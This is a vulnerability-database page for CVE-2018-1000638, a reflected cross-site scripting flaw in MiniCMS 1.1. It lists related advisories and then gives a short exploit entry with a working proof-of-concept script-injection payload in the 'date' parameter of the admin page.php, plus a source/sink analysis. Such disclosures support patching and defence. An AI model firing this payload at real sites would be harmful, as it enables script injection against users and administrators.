| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2018-1000638 | 12 Apr 202521:02 | – | circl | |
| MiniCMS Cross-Site Scripting Vulnerability (CNVD-2018-15846) | 22 Aug 201800:00 | – | cnvd | |
| CVE-2018-1000638 | 20 Aug 201819:00 | – | cve | |
| CVE-2018-1000638 | 20 Aug 201819:00 | – | cvelist | |
| EUVD-2018-1972 | 7 Oct 202500:30 | – | euvd | |
| CVE-2018-1000638 | 20 Aug 201819:31 | – | nvd | |
| 📄 MiniCMS 1.1 Cross Site Scripting | 11 Apr 202500:00 | – | packetstorm | |
| 📄 MiniCMS 1.11 Exploitation Toolkit | 2 Feb 202600:00 | – | packetstorm | |
| Cross site scripting | 20 Aug 201819:31 | – | prion | |
| CVE-2018-1000638 | 22 May 202507:54 | – | redhatcve |
# Exploit Title: MiniCMS 1.1 - Cross Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/bg5sbk/MiniCMS
# Software Link: https://github.com/bg5sbk/MiniCMS
# Version: 1.10
# Tested on: Ubuntu Windows
# CVE : CVE-2018-1000638
PoC:
GET http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>
"Sink": "echo $filter_date;", "Vulnerable Variable": "filter_date", "Source": "GET parameter 'date'", "Sanitization Mechanisms Before Patch": "None (directly echoed without encoding)", "Sink Context Constraints": "Injected in HTML attribute (URL query string)", "Attack Payload": ""><script>alert('XSS')</script>", "Execution Path Constraints": "The 'date' GET parameter must be set in the URL query string and passed without filtering", "Request URL": "http://minicms/mc-admin/page.php?date=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E", "Request Parameter":"date","Request Method": "GET", "Final PoC": "http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>"
[Replace Your Domain Name]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation